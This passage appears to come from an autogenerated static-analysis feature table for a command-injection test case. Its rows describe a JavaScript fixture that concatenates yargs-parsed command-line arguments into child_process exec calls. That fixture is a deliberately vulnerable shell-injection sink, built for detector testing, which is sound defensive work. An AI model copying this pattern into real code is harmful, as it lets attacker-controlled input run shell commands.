argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:38:11:38:19 | 'verbose' | CalleeFlexibleAccessPath | import(!).command().option | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:38:11:38:19 | 'verbose' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:38:11:38:19 | 'verbose' | calleeImports | yargs | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:38:11:38:19 | 'verbose' | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:38:11:38:19 | 'verbose' | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:38:11:38:19 | 'verbose' | enclosingFunctionBody | args require yargs command serve [port] start the server yargs option verbose foo bar argv cp exec cmd.sh args cp exec cmd.sh require yargs array foo parse foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:38:11:38:19 | 'verbose' | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:38:11:38:19 | 'verbose' | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:38:22:38:35 | { foo: "bar" } | CalleeFlexibleAccessPath | import(!).command().option | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:38:22:38:35 | { foo: "bar" } | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:38:22:38:35 | { foo: "bar" } | calleeImports | yargs | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:38:22:38:35 | { foo: "bar" } | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:38:22:38:35 | { foo: "bar" } | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:38:22:38:35 | { foo: "bar" } | enclosingFunctionBody | args require yargs command serve [port] start the server yargs option verbose foo bar argv cp exec cmd.sh args cp exec cmd.sh require yargs array foo parse foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:38:22:38:35 | { foo: "bar" } | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:38:22:38:35 | { foo: "bar" } | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:38:24:38:26 | foo | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:38:24:38:26 | foo | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:38:24:38:26 | foo | enclosingFunctionBody | args require yargs command serve [port] start the server yargs option verbose foo bar argv cp exec cmd.sh args cp exec cmd.sh require yargs array foo parse foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:38:24:38:26 | foo | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:38:24:38:26 | foo | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:38:24:38:33 | foo: "bar" | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:38:24:38:33 | foo: "bar" | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:38:24:38:33 | foo: "bar" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:38:24:38:33 | foo: "bar" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:38:24:38:33 | foo: "bar" | enclosingFunctionBody | args require yargs command serve [port] start the server yargs option verbose foo bar argv cp exec cmd.sh args cp exec cmd.sh require yargs array foo parse foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:38:24:38:33 | foo: "bar" | enclosingFunctionBody | args require yargs command serve [port] start the server yargs option verbose foo bar argv cp exec cmd.sh args cp exec cmd.sh require yargs array foo parse foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:38:24:38:33 | foo: "bar" | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:38:24:38:33 | foo: "bar" | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:38:24:38:33 | foo: "bar" | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:38:24:38:33 | foo: "bar" | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:38:29:38:33 | "bar" | CalleeFlexibleAccessPath | import(!).command().option | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:38:29:38:33 | "bar" | InputAccessPathFromCallee | 1.foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:38:29:38:33 | "bar" | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:38:29:38:33 | "bar" | assignedToPropName | foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:38:29:38:33 | "bar" | calleeImports | yargs | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:38:29:38:33 | "bar" | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:38:29:38:33 | "bar" | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:38:29:38:33 | "bar" | enclosingFunctionBody | args require yargs command serve [port] start the server yargs option verbose foo bar argv cp exec cmd.sh args cp exec cmd.sh require yargs array foo parse foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:38:29:38:33 | "bar" | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:38:29:38:33 | "bar" | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:39:4:39:7 | argv | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:39:4:39:7 | argv | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:39:4:39:7 | argv | enclosingFunctionBody | args require yargs command serve [port] start the server yargs option verbose foo bar argv cp exec cmd.sh args cp exec cmd.sh require yargs array foo parse foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:39:4:39:7 | argv | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:39:4:39:7 | argv | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:41:2:41:3 | cp | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:41:2:41:3 | cp | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:41:2:41:3 | cp | enclosingFunctionBody | args require yargs command serve [port] start the server yargs option verbose foo bar argv cp exec cmd.sh args cp exec cmd.sh require yargs array foo parse foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:41:2:41:3 | cp | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:41:2:41:3 | cp | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:41:2:41:8 | cp.exec | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:41:2:41:8 | cp.exec | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:41:2:41:8 | cp.exec | enclosingFunctionBody | args require yargs command serve [port] start the server yargs option verbose foo bar argv cp exec cmd.sh args cp exec cmd.sh require yargs array foo parse foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:41:2:41:8 | cp.exec | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:41:2:41:8 | cp.exec | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:41:2:41:26 | cp.exec ... + args) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:41:2:41:26 | cp.exec ... + args) | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:41:2:41:26 | cp.exec ... + args) | enclosingFunctionBody | args require yargs command serve [port] start the server yargs option verbose foo bar argv cp exec cmd.sh args cp exec cmd.sh require yargs array foo parse foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:41:2:41:26 | cp.exec ... + args) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:41:2:41:26 | cp.exec ... + args) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:41:2:41:26 | exceptional return of cp.exec ... + args) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:41:2:41:26 | exceptional return of cp.exec ... + args) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:41:2:41:26 | exceptional return of cp.exec ... + args) | enclosingFunctionBody | args require yargs command serve [port] start the server yargs option verbose foo bar argv cp exec cmd.sh args cp exec cmd.sh require yargs array foo parse foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:41:2:41:26 | exceptional return of cp.exec ... + args) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:41:2:41:26 | exceptional return of cp.exec ... + args) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:41:5:41:8 | exec | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:41:5:41:8 | exec | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:41:5:41:8 | exec | enclosingFunctionBody | args require yargs command serve [port] start the server yargs option verbose foo bar argv cp exec cmd.sh args cp exec cmd.sh require yargs array foo parse foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:41:5:41:8 | exec | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:41:5:41:8 | exec | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:41:10:41:18 | "cmd.sh " | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:41:10:41:18 | "cmd.sh " | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:41:10:41:18 | "cmd.sh " | enclosingFunctionBody | args require yargs command serve [port] start the server yargs option verbose foo bar argv cp exec cmd.sh args cp exec cmd.sh require yargs array foo parse foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:41:10:41:18 | "cmd.sh " | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:41:10:41:18 | "cmd.sh " | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:41:10:41:18 | "cmd.sh " | stringConcatenatedWith | -endpoint- args | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:41:10:41:25 | "cmd.sh " + args | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:41:10:41:25 | "cmd.sh " + args | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:41:10:41:25 | "cmd.sh " + args | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:41:10:41:25 | "cmd.sh " + args | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:41:10:41:25 | "cmd.sh " + args | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:41:10:41:25 | "cmd.sh " + args | enclosingFunctionBody | args require yargs command serve [port] start the server yargs option verbose foo bar argv cp exec cmd.sh args cp exec cmd.sh require yargs array foo parse foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:41:10:41:25 | "cmd.sh " + args | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:41:10:41:25 | "cmd.sh " + args | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:41:10:41:25 | "cmd.sh " + args | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:41:22:41:25 | args | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:41:22:41:25 | args | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:41:22:41:25 | args | enclosingFunctionBody | args require yargs command serve [port] start the server yargs option verbose foo bar argv cp exec cmd.sh args cp exec cmd.sh require yargs array foo parse foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:41:22:41:25 | args | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:41:22:41:25 | args | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:41:22:41:25 | args | stringConcatenatedWith | 'cmd.sh ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:2:43:3 | cp | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:2:43:3 | cp | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:2:43:3 | cp | enclosingFunctionBody | args require yargs command serve [port] start the server yargs option verbose foo bar argv cp exec cmd.sh args cp exec cmd.sh require yargs array foo parse foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:2:43:3 | cp | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:2:43:3 | cp | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:2:43:8 | cp.exec | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:2:43:8 | cp.exec | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:2:43:8 | cp.exec | enclosingFunctionBody | args require yargs command serve [port] start the server yargs option verbose foo bar argv cp exec cmd.sh args cp exec cmd.sh require yargs array foo parse foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:2:43:8 | cp.exec | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:2:43:8 | cp.exec | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:2:43:63 | cp.exec ... ().foo) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:2:43:63 | cp.exec ... ().foo) | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:2:43:63 | cp.exec ... ().foo) | enclosingFunctionBody | args require yargs command serve [port] start the server yargs option verbose foo bar argv cp exec cmd.sh args cp exec cmd.sh require yargs array foo parse foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:2:43:63 | cp.exec ... ().foo) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:2:43:63 | cp.exec ... ().foo) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:2:43:63 | exceptional return of cp.exec ... ().foo) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:2:43:63 | exceptional return of cp.exec ... ().foo) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:2:43:63 | exceptional return of cp.exec ... ().foo) | enclosingFunctionBody | args require yargs command serve [port] start the server yargs option verbose foo bar argv cp exec cmd.sh args cp exec cmd.sh require yargs array foo parse foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:2:43:63 | exceptional return of cp.exec ... ().foo) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:2:43:63 | exceptional return of cp.exec ... ().foo) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:5:43:8 | exec | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:5:43:8 | exec | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:5:43:8 | exec | enclosingFunctionBody | args require yargs command serve [port] start the server yargs option verbose foo bar argv cp exec cmd.sh args cp exec cmd.sh require yargs array foo parse foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:5:43:8 | exec | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:5:43:8 | exec | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:10:43:18 | "cmd.sh " | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:10:43:18 | "cmd.sh " | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:10:43:18 | "cmd.sh " | enclosingFunctionBody | args require yargs command serve [port] start the server yargs option verbose foo bar argv cp exec cmd.sh args cp exec cmd.sh require yargs array foo parse foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:10:43:18 | "cmd.sh " | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:10:43:18 | "cmd.sh " | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:10:43:18 | "cmd.sh " | stringConcatenatedWith | -endpoint- import(!).array().parse().foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:10:43:62 | "cmd.sh ... e().foo | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:10:43:62 | "cmd.sh ... e().foo | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:10:43:62 | "cmd.sh ... e().foo | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:10:43:62 | "cmd.sh ... e().foo | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:10:43:62 | "cmd.sh ... e().foo | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:10:43:62 | "cmd.sh ... e().foo | enclosingFunctionBody | args require yargs command serve [port] start the server yargs option verbose foo bar argv cp exec cmd.sh args cp exec cmd.sh require yargs array foo parse foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:10:43:62 | "cmd.sh ... e().foo | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:10:43:62 | "cmd.sh ... e().foo | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:10:43:62 | "cmd.sh ... e().foo | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:22:43:28 | require | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:22:43:28 | require | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:22:43:28 | require | enclosingFunctionBody | args require yargs command serve [port] start the server yargs option verbose foo bar argv cp exec cmd.sh args cp exec cmd.sh require yargs array foo parse foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:22:43:28 | require | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:22:43:28 | require | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:22:43:37 | exceptional return of require("yargs") | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:22:43:37 | exceptional return of require("yargs") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:22:43:37 | exceptional return of require("yargs") | enclosingFunctionBody | args require yargs command serve [port] start the server yargs option verbose foo bar argv cp exec cmd.sh args cp exec cmd.sh require yargs array foo parse foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:22:43:37 | exceptional return of require("yargs") | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:22:43:37 | exceptional return of require("yargs") | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:22:43:37 | require("yargs") | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:22:43:37 | require("yargs") | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:22:43:37 | require("yargs") | enclosingFunctionBody | args require yargs command serve [port] start the server yargs option verbose foo bar argv cp exec cmd.sh args cp exec cmd.sh require yargs array foo parse foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:22:43:37 | require("yargs") | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:22:43:37 | require("yargs") | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:22:43:43 | require ... ).array | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:22:43:43 | require ... ).array | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:22:43:43 | require ... ).array | enclosingFunctionBody | args require yargs command serve [port] start the server yargs option verbose foo bar argv cp exec cmd.sh args cp exec cmd.sh require yargs array foo parse foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:22:43:43 | require ... ).array | enclosingFunctionName | | +| 